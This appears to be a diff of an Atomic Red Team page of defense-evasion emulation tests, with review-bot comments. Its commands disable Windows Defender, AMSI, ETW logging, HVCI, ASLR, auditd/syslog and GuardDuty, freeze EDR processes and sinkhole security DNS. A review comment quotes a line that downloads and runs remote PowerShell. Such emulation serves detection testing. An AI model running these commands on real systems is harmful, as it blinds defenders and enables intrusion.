### Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell
### Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
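Review bot: `iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/...')` in Atomic Test #33 executes whatever the remote branch serves at run time, with no pin and no hash, so the test's behaviour can change underneath the suite between runs; pin the raw URL to a commit SHA or vendor the script under ExternalPayloads like the other tools, and document `inv-phantom` as the function being invoked.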
@@ -1000,7 +1083,7 @@ Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```
### Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
### Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
LockBit Black - Disable Privacy Settings Experience Using Registry
@@ -1019,7 +1102,7 @@ reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperie
```cmd
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
```
### Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
### Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
LockBit Black - Use Registry Editor to turn on automatic logon
@@ -1044,7 +1127,7 @@ reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
```
### Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
### Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
LockBit Black - Disable Privacy Settings Experience Using Registry
@@ -1063,7 +1146,7 @@ New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisableP
```powershell
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
```
### Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
### Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Lockbit Black - Use Registry Editor to turn on automatic logon
@@ -1088,7 +1171,7 @@ Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
```
### Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
### Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -1109,7 +1192,7 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestar
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
```
### Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder
### Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
@@ -1129,7 +1212,7 @@ wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference ca
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
```
### Atomic Test #38: Delete Windows Defender Scheduled Tasks
### Atomic Test #41: Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.
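Review bot: both the attack and this cleanup in Atomic Test #40 depend on `wmic.exe`, which Microsoft has deprecated and which is an optional Feature on Demand absent from clean Windows 11 24H2 installs, so the test fails with "not recognized" on current hosts; add a prereq check for `wmic.exe` and document the CIM equivalent, `Invoke-CimMethod -Namespace root\Microsoft\Windows\Defender -ClassName MSFT_MpPreference -MethodName Remove -Arguments @{ExclusionPath=[string[]]'ATOMICREDTEAM'}`, for the cleanup.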
@@ -1176,7 +1259,7 @@ schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender V
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
```
### Atomic Test #39: Clear History
### Atomic Test #42: Clear History
Clear Shell History. This technique only affect the bash shell application.
@@ -1190,7 +1273,7 @@ Clear Shell History. This technique only affect the bash shell application.
history -c
```
### Atomic Test #40: Suspend History
### Atomic Test #43: Suspend History
suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
@@ -1209,7 +1292,7 @@ set +o history
```sh
set -o history
```
### Atomic Test #41: Reboot Linux Host via Kernel System Request
### Atomic Test #44: Reboot Linux Host via Kernel System Request
reboot system via system request seen in Awfulshred wiper.
@@ -1224,7 +1307,7 @@ echo 1> /proc/sys/kernel/sysrq
echo b> /proc/sysrq-trigger
```
### Atomic Test #42: Clear Pagging Cache
### Atomic Test #45: Clear Pagging Cache
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
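Review bot: the renumbered heading at this hunk still reads "Clear Pagging Cache", and the description under it repeats "pagging"; since the test name is being regenerated anyway, correct the spelling to "Paging" in the test's `name:` and `description:` in the yaml source so the generated heading comes out right rather than hand-patching the markdown.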
@@ -1240,7 +1323,7 @@ free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches
```
### Atomic Test #43: Disable Memory Swap
### Atomic Test #46: Disable Memory Swap
disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional
payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
@@ -1265,7 +1348,7 @@ swapon -a
sleep 2
sync
```
### Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)
### Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be ran in order to setup HVCI and have it enabled.
@@ -1313,7 +1396,7 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorE
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
```
### Atomic Test #45: AMSI Bypass - Override AMSI via COM
### Atomic Test #48: AMSI Bypass - Override AMSI via COM
With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
This is currently being used by AsyncRAT and others.
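Review bot: the description kept in this hunk says "With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}", but writing under HKCU needs no administrative rights; that is the point of the technique, a per-user CLSID override shadows the machine-wide COM registration without elevation. Reword to "Without administrative rights" (or "as a standard user") so the test's threat model matches what the `REG ADD HKCU\...` command actually exercises.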
@@ -1335,7 +1418,7 @@ REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InPro
```cmd
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
```
### Atomic Test #46: AWS - GuardDuty Suspension or Deletion
### Atomic Test #49: AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
@@ -1379,7 +1462,7 @@ cat ~/.aws/credentials | grep "default"
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
```
### Atomic Test #47: Tamper with Defender ATP on Linux/MacOS
### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
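Review bot: the new heading reads `### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS`; the trailing `x` is a stray character in the renumbering (every neighbouring heading is a clean +3 bump, #47 -> #50, and the next test is #51). Drop the `x` so the sequence #49, #50, #51 is contiguous, and if this markdown is rendered from the yaml, fix the generator input rather than this file.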
@@ -1398,7 +1481,7 @@ sudo mdatp config real-time-protection --value disabled
```sh
sudo mdatp config real-time-protection --value enabled
```
### Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe
### Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
@@ -1451,7 +1534,7 @@ reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
```
### Atomic Test #49: Tamper with Windows Defender Registry - Powershell
### Atomic Test #52: Tamper with Windows Defender Registry - Powershell
Disable Windows Defender by tampering with windows defender registry through powershell
@@ -1504,7 +1587,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "Tam
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
```
### Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI
### Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
@@ -1547,7 +1630,7 @@ if (-not $RequiredModule) {exit 1}
Install-Module -Name VMware.PowerCLI -Confirm:$false
```
### Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune
### Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
@@ -1580,7 +1663,7 @@ Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
```
### Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO
### Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
@@ -1607,7 +1690,7 @@ Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
```
### Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key
### Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
@@ -1628,7 +1711,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name
```powershell
Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
```
### Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
### Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
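Review bot: the description carried in this hunk for "AMSI Bypass - Create AMSIEnable Reg Key" names the key as "HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable", which folds the value name into the key path; the command below it writes the `AmsiEnable` value under `HKCU:\Software\Microsoft\Windows Script\Settings`. Fix the description to match, since defenders copy these paths into registry-monitoring rules. Also note the cleanup removes the whole `Windows Script\Settings` key with `-Recurse`, not just the value the attack added, which is wider than the change being undone.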
@@ -1647,7 +1730,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
```
### Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
### Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
@@ -1666,7 +1749,7 @@ New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Eve
```powershell
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd
### Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
@@ -1691,7 +1774,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
```cmd
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
```
### Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell
### Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
@@ -1716,7 +1799,7 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev
```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
```
### Atomic Test #58: Freeze PPL-protected process with EDR-Freeze
### Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
@@ -1882,7 +1965,7 @@ Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | O
Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"
```
### Atomic Test #59: Disable ASLR Via sysctl parameters - Linux
### Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
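Review bot: the description for the renumbered test #62 opens with "Detects Execution of the `sysctl` command ...", which is detection-rule wording, not a statement of what the atomic does. Reword to something like "Disables ASLR by running `sysctl -w kernel.randomize_va_space=0`; the cleanup restores the default of 2", so the test reads like the other entries and a reader does not mistake it for a Sigma rule title.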
@@ -1901,3 +1984,378 @@ sysctl -w kernel.randomize_va_space=0
```bash
sysctl -w kernel.randomize_va_space=2
```
### Atomic Test #63: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```
#### Cleanup Commands
```bash
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
### Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```
#### Cleanup Commands
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
### Atomic Test #65: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
#### Cleanup Commands
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
### Atomic Test #66: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```
#### Cleanup Commands
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
### Atomic Test #67: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** Windows
**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
| session | The session to disable. | string | EventLog-Application|
| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```
#### Cleanup Commands
```powershell
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```
#### Dependencies: Run with `powershell`!
##### Description: PSExec must be installed on the machine.
###### Check Prereq Commands
```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
### Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```
#### Cleanup Commands
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
### Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
### Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
### Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
### Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
#### Attack Commands: Run with `command_prompt`!
```cmd
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
```
### Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
```
### Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
```
#### Cleanup Commands
```powershell
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
```
